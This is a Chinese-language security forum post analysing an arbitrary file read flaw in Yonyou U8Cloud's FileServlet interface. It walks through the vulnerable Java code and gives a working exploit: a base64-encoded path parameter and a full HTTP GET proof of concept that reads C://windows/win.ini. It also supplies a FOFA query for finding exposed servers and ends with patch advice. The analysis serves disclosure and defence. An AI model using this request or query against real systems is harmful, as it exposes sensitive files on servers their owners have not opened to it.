奇安信攻防社区-用友 U8Cloud FileServlet 任意文件读取漏洞分析

用友 U8Cloud FileServlet 任意文件读取漏洞分析

U8cloud系统FileServlet接口存在任意文件读取漏洞，攻击者读取系统任意文件，造成敏感信息泄露

一、漏洞简介
------

U8cloud系统`FileServlet`接口存在任意文件读取漏洞，攻击者读取系统任意文件，造成敏感信息泄露。

二、影响版本
------

1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp

三、漏洞原理分析
--------

漏洞位于`FileServlet`接口处，文件路径为`nc.bs.hr.tools.trans.FileServlet`

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-bd3ba9843e471f8e360ef7a7f40506abd8becca2.png)

来到漏洞方法被调用就会执行的`doAction`中，此处调用了`performTask`方法

```php
  public void doAction(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {  
    performTask(request, response);  
  }
```

追踪`performTask`方法

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-cbc625cfecbc00e4d1e6755eb2f3c8f150017c6f.png)

关键代码如下，传参`path`赋值给`encodedPath`，使用 `BASE64Decoder`对`encodedPath`进行`Base64`解码，将解码后的字节数组转换为字符串`path`，之后调用`retrieveFile.getFileContent(path)`方法获取文件内容

```php
      String encodedPath = request.getParameter("path");  
      BASE64Decoder decoder = new BASE64Decoder();  
      byte[] data = decoder.decodeBuffer(encodedPath);  
      String path = new String(data);  
      int index = path.lastIndexOf(".");  
      String ext = null;  
      if (index != -1)  
        ext = path.substring(index + 1);   
      if (ext != null) {  
        String contenttype = this.contentTypes.get(ext);  
        if (contenttype != null)  
          response.setContentType(contenttype);   
      }   
      byte[] filedata = this.retrieveFile.getFileContent(path);  
      if (filedata == null)  
        filedata = new byte[0];   
      ServletOutputStream servletOutputStream = response.getOutputStream();  
      servletOutputStream.write(filedata);  
      servletOutputStream.flush();  
      servletOutputStream.close();  
    } catch (Throwable theException) {  
      theException.printStackTrace();  
    }
```

继续追踪`getFileContent`方法

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-9096b9d0491f5889eba1cba55078462613787af8.png)

此处可见是直接读取`path`参数对应的路径的文件，返回给前端，造成任意文件读取

再根据用友U8 Cloud特性，请求前缀为`/service`和`/servlet`前缀的都经过`NCInvokerServlet`方法处理，通过获得url路径后，如果是以`/~`开头，截取第一部分为`moduleName`，然后再截取第二部分为`serviceName`，再根据`getServiceObject(moduleName, serviceName)`实现任意`Servlet`的调用。该漏洞的请求URL如下，可以指定读取`C://windows/win.ini`文件内容

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-a79f86139a1920578b723252c0fee2478c0cbb49.png)

```php
/service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ==
```

四、总结
----

U8cloud系统`FileServlet`接口的可以读取任意文件内容返回，造成系统敏感信息泄露。

五、资产测绘
------

FOFA语法

```php
app="用友-U8-Cloud"
```

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/02/attach-5e36c98ed7cbf96cab4a4e3d3612aa0e36533812.png)

六、漏洞复现
------

POC

```php
GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

成功读取`C://windows/win.ini`文件内容

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/05/attach-32ac88d121223485169b5a29e861e5ee03e293ef.png)

七、修复建议
------

安装用友U8cloud最新的补丁，或修改对应方法中直接读取文件内容返回的方法，对接口添加身份信息验证并限制读取文件目录。

发表于 2025-05-15 09:00:01
阅读 ( 165 )
分类：OA产品

用友 U8Cloud FileServlet 任意文件读取漏洞分析

0 条评论